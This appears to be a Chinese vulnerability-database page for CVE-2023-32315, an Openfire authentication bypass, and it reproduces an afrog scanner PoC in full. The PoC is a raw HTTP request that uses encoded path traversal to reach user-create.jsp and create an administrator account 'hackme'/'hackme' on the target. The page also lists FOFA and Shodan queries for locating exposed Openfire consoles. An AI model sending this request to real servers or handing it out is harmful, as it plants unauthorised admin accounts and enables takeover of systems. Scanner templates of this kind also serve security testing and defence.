CVE-2023-32315-2: Openfire身份认证绕过漏洞

日期: 2025-09-01 | 影响软件: Openfire | POC: 已公开

漏洞描述

FOFA: app="Openfire-管理界面" SHODAN: title:"openfire"

PoC代码[已公开]

id: CVE-2023-32315-2

info:
  name: Openfire身份认证绕过漏洞
  author: zan8in
  severity: high
  verified: true
  description: |
    FOFA: app="Openfire-管理界面"
    SHODAN: title:"openfire"
  reference:
    - https://mp.weixin.qq.com/s/ww4Gr5aJ3QvCdBYLNCiubA
  tags: openfire,bypass
  created: 2023/09/03

set:
  hostname: request.url.host
rules:
  r0:
    request:
      request:
      raw: |
        GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf=csrftoken&username=hackme&name=&email=&password=hackme&passwordConfirm=hackme&isadmin=on&create=Create+User HTTP/1.1
        Host: {{hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    expression: response.status == 200 && response.body.bcontains(b'Exception:') && response.raw_header.ibcontains(b'JSESSIONID=') && response.raw_header.ibcontains(b'csrf=')
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2023/CVE-2023-32315-2.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

CVE-2023-32315: Openfire Console authentication bypass POC

openfire-default-password: OpenFire 默认账号密码 POC

CVE-2019-18393: Ignite Realtime Openfire <4.42 - Local File Inclusion POC

PrestaShop /module/tshirtecommerce/designer SQL 注入漏洞（CVE-2023-27637） 无POC

PrestaShop SQL 注入漏洞（CVE-2023-46358） 无POC

PrestaShop /module/tshirtecommerce/designer SQL 注入漏洞（CVE-2023-27637）无POC

PrestaShop SQL 注入漏洞（CVE-2023-46358）无POC